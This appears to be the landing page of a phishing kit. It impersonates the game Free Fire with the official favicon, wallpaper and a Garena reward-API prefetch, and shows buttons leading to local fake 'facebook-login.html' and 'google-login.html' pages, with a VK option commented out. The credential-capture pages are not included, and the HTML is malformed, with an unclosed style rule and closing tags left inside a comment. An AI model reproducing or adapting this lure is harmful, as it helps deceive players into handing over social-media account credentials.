<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta http-equiv="x-dns-prefetch-control" content="on">
    <meta name="viewport" content="width=device-width,initial-scale=1,viewport-fit=cover">
    <title>Free Fire</title>
    <link rel="dns-prefetch" href="https://prod-api.reward.ff.garena.com/">
    <link rel="icon" href="https://freefiremobile-a.akamaihd.net/ffwebsite/images/freefire32-2.ico" type="image/x-icon">
    <link rel="shortcut icon" href="https://freefiremobile-a.akamaihd.net/ffwebsite/images/freefire16-2.ico" type="image/x-icon">
    <meta name="description" content="">
    <meta name="author" content="">
    <meta name="title" content="FreeFire">
    <meta name="description" content="FreeFire">
    <meta property="og:title" content="FreeFire">
    <meta property="og:description" content="FreeFire">
    <link href="style.css" type="text/css" rel="stylesheet">
<!--
     <div id="bg">
         <img src="" alt="">
         <div id="bg_main"></div>
     </div>
     <link rel="stylesheet" type="text/css" href="style.css">

     <style>
         #bg_main{ 
            height: 400px;
            width: 100%;
            background-image: url('portrait.jpg');
            background-size: cover; 

         }
     </style>
-->


    <style>
      

      body {
  background-image: url('https://dl.dir.freefiremobile.com/common/web_event/officialwebsite/wallpapers/mobile/047.jpg');
  background-repeat: no-repeat;
  background-attachment: fixed;
  background-size: cover;
        #main_content{
            background: #fff;
            width: 80%;
            margin: auto;
            height: 100%;
            padding: 2%;
        }
    </style>
  
<!--                               -->


        <div id="facebook1">
           <a href="facebook-login.html" align="middle"> <h1 align="center">Facebook</h1></a>
            <div id="facebook_main"></div>
        </div>
        <link rel="stylesheet" type="text/css" href="/style.css">

        <style>

    #facebook_main{
        background-color:;
            width: 20%;
            height: 50px;
            background-image: url(https://th.bing.com/th?q=Facebook+Page+Border&w=120&h=120&c=1&rs=1&qlt=90&cb=1&dpr=1.25&pid=InlineBlock&mkt=en-IN&adlt=moderate&t=1&mw=247);
            background-repeat: no-repeat;
            background-position: center, top left;
            background-size: 50px 100%;
        }

     </style>


<!---->

<div id="Google">
    <a href="google-login.html" align="middle"><h2>GOOGLE</h2> </a>
     <div id="Google_main"></div>
 </div>
 <style>
#Google_main{
 background-color:;
 
     width: 30%;
     height: 150px;
     background-image: url(https://www.sketchappsources.com/resources/source-image/google-g-logo.jpg);
     background-repeat: no-repeat;
     background-position:center, top right;
     background-size: 300px 100%;

}
</style>

<!--hello bro -->

<!--
<div id="VK">
    <a href="vk-login.html" align="middle"><h3>VK</h3> </a>
     <div id="VK_main"></div>
 </div>     
 <style>
#VK_main{
 background-color:;
     width: 15%;
     height: 200px;
     background-image: url(http://icons.iconarchive.com/icons/limav/flat-gradient-social/512/Vk-icon.png);
     background-repeat: no-repeat;
     background-position:center, left;
     background-size: 300px 100%;
}
</style>








    </head>
</html>
-->
